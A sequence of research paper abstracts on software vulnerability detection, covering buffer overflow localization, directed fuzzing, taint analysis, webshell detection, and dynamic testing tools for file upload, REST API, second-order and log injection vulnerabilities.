Buffer overflow vulnerability is one of the most common and harmful vulnerabilities in computer software. This paper analyzed and summarized the general method and process of testing buffer overflow vulnerability in software. And the key data structure localization technology in software buffer overflow vulnerability was also studied in this paper. By constructing special filling data and designing location algorithm, this paper presented a new localization technology based on block localization. The technology can locate key data structure address of buffer overflow vulnerability fleetly and exactly. It can effectively assist testing buffer overflow vulnerabilities in software security.
Directed grey-box fuzzing (DGF) aims to discover vulnerabilities in specific code areas efficiently. Distance metric, which is used to measure the quality of seed in DGF, is a crucial factor in affecting the fuzzing performance. Despite distance metrics being widely applied in existing DGF frameworks, it remains opaque about how different distance metrics guide the fuzzing process and affect the fuzzing result in practice. In this paper, we conduct the first empirical study to explore how different distance metrics perform in guiding DGFs. Specifically, we systematically discuss different distance metrics in the aspect of calculation method and granularity. Then, we implement different distance metrics based on AFLGo. On this basis, we conduct comprehensive experiments to evaluate the performance of these distance metrics on the benchmarks widely used in existing DGF-related work. The experimental results demonstrate the following insights. First, the difference among different distance metrics with varying methods of calculation and granularities is not significant. Second, the distance metrics may not be effective in describing the difficulty of triggering the target vulnerability. In addition, by scrutinizing the quality of testcases, our research highlights the inherent limitation of existing mutation strategies in generating high-quality testcases, calling for designing effective mutation strategies for directed fuzzing. We open-source the implementation code and experiment dataset to facilitate future research in DGF.
Vulnerabilities have become one of the most important factors thread network safety. Vulnerability evaluation can help to judge its exploitability. However, the Common Vulnerability soring System(CVSS)'s granularity is too coarse and it does not consider the different weight of factors. This paper select the special factors related to the vulnerability exploitability and uses hierarchical analysis, information entropy and fuzzy comprehensive evaluation to evaluate the vulnerability exploitability, which is proved to be more precise than the CVSS evaluation method.
Taint analysis technique is the key technique means for analyzing the robustness of programs and vulnerability mining.By marking the data which are sensitive or untrusted, one can observe the flow of these tainted data during program execution, then determine whether the marked data affects the key nodes of the program.According to the implementation mechanism, the taint analysis can be divided into static taint analysis and dynamic taint analysis.As an auxiliary technique, it can be combined with mainstream vulnerability mining techniques such as fuzzing test and symbol execution, playing a great role in test case construction and path feasibility analysis.This article firstly introduces the basic concepts of dynamic taint analysis technique.Second, it focuses on the process of dynamic taint marking, propagation and detection.Then it summarizes the main defects in taint analysis and the application status of dynamic taint analysis technique.Finally, it is compared with the current mainstream taint analysis tools and explores the future trends of taint analysis technique.
A webshell is a malicious backdoor that allows remote access and control to a web server by executing arbitrary commands. The wide use of obfuscation and encryption technologies has greatly increased the difficulty of webshell detection. To this end, we propose a novel webshell detection model leveraging the grammatical features extracted from the PHP code. The key idea is to combine the executable data characteristics of the PHP code with static text features for webshell classification. To verify the proposed model, we construct a cleaned data set of webshell consisting of 2,917 samples from 17 webshell collection projects and conduct extensive experiments. We have designed three sets of controlled experiments, the results of which show that the accuracy of the three algorithms has reached more than 99.40%, the highest reached 99.66%, the recall rate has been increased by at least 1.8%, the most increased by 6.75%, and the F1 value has increased by 2.02% on average. It not only confirms the efficiency of the grammatical features in webshell detection but also shows that our system significantly outperforms several state‐of‐the‐art rivals in terms of detection accuracy and recall rate.
Unrestricted file upload (UFU) vulnerabilities, especially unrestricted executable file upload (UEFU) vulnerabilities, pose severe security risks to web servers. For instance, attackers can leverage such vulnerabilities to execute arbitrary code to gain the control of a whole web server. Therefore, it is significant to develop effective and efficient methods to detect UFU and UEFU vulnerabilities. Towards this, most state-of-the-art methods are designed based on dynamic testing. Nevertheless, they still entail two critical limitations. 1) They heavily rely on manual efforts, which are error-prone and have poor adaptability. 2) They seldom leverage effective information to guide the testing, resulting in generating a large number of invalid test cases. Such limitations severely hinder the performance of UFU vulnerability detection. In this paper, we propose URadar, an adaptive dynamic testing-based method for detecting UFU and UEFU vulnerabilities. There are three core designs in URadar, including file upload interface identification, file type restriction inference, and invalid mutation combination filtration, which can effectively solve the two limitations of existing methods. To evaluate the performance of URadar, we conduct extensive experiments and compare URadar with state-of-the-art methods (e.g., FUSE, RIPS). In testing 18 web applications, URadar discovers 26 UEFU vulnerabilities, where 8 are new, and 6 have been assigned new CVE/CNNVD IDs. By contrast, FUSE and RIPS find 14 and 2 UEFU vulnerabilities, respectively. To discover the same number of UFU vulnerabilities, FUSE needs to send 73,261 request packets with a time cost of 2,791.1s on average, 23.43 and 20.53 times of the requirements for URadar. The above results demonstrate that URadar significantly outperforms the state-of-the-art methods. In addition, we have open-sourced URadar to facilitate future research on UFU vulnerability detection.
Modern web services widely provide RESTful APIs for clients to access their functionality programmatically. Fuzzing is an emerging technique for ensuring the reliability of RESTful APIs. However, the existing RESTful API fuzzers repeatedly generate invalid requests due to unawareness of errors in the invalid tested requests and lack of effective strategy to generate legal value for the incorrect parameters. Such limitations severely hinder the fuzzing performance. In this paper, we propose DynER, a new test case generation method guided by dynamic error responses during fuzzing. DynER designs two strategies of parameter value generation for purposefully revising the incorrect parameters of invalid tested requests to generate new test requests. The strategies are, respectively, based on prompting Large Language Model (LLM) to understand the semantics information in error responses and actively accessing API-related resources. We apply DynER to the state-of-the-art fuzzer RESTler and implement DynER-RESTler. DynER-RESTler outperforms foREST on two real-world RESTful services, WordPress and GitLab with a 41.21% and 26.33% higher average pass rate for test requests and a 12.50% and 22.80% higher average number of unique request types successfully tested, respectively. The experimental results demonstrate that DynER significantly improves the effectiveness of test cases and fuzzing performance. Additionally, DynER-RESTler finds three new bugs.
Web application second-order vulnerabilities first inject malicious code into the persistent data stores of the web server and then execute it at later sensitive operations, causing severe impact. Nevertheless, the dynamic features, the complex data propagation, and the inter-state dependencies bring many challenges in discovering such vulnerabilities. To address these challenges, we propose DISOV, a web application property graph (WAPG) based method to discover second-order vulnerabilities. Specifically, DISOV first constructs WAPG to represent data propagation and inter-state dependencies of the web application, which can be further leveraged to find the potential second-order vulnerabilities paths. Then, it leverages fuzz testing to verify the potential vulnerabilities paths. To verify the effectiveness of DISOV, we tested it in 13 popular web applications in real-world and compared with Black Widow, the state-of-the-art web vulnerability scanner. DISOV discovered 43 second-order vulnerabilities, including 23 second-order XSS vulnerabilities, 3 second-order SQL injection vulnerabilities, and 17 second-order RCE vulnerabilities. While Black Widow only discovered 18 second-order XSS vulnerabilities, with none second-order SQL injection vulnerability and second-order RCE vulnerability. In addition, DISOV has found 12 0-day second-order vulnerabilities, demonstrating its effectiveness in practice.
Web applications widely use the logging functionality, but improper handling can bring serious security threats. An attacker can trigger the execution of malicious data by writing malicious data to the web application logs and then accessing the view–logs interface, resulting in a vulnerability of the web application log injection. However, detecting this type of vulnerability requires automatic discovery of log-injectable interfaces and view–logs interfaces, which is difficult. In addition, bypasssing the application-specific input-filtering checks to write an effective payload to the log is also challenging. This paper proposes LogInjector, an efficient web application log injection vulnerability detection method. First, it obtains the log storage form and location and then finds the log-injectable interfaces through the extended dynamic crawler. Second, it automatically identifies the web application view–logs interfaces. Finally, LogInjector utilizes a dynamic testing approach based on the feedback-guided mutation to detect web application log injection vulnerabilities. To verify the effectiveness of LogInjector, we test it in 14 popular web applications in real-world cases and compare it with Black Widow, the state-of-the-art web vulnerability scanner. LogInjector detects 16 web application log injection vulnerabilities, including 6 zero-day vulnerabilities, while Black Widow can only detect three log injection vulnerabilities, demonstrating the effectiveness of LogInjector in practice.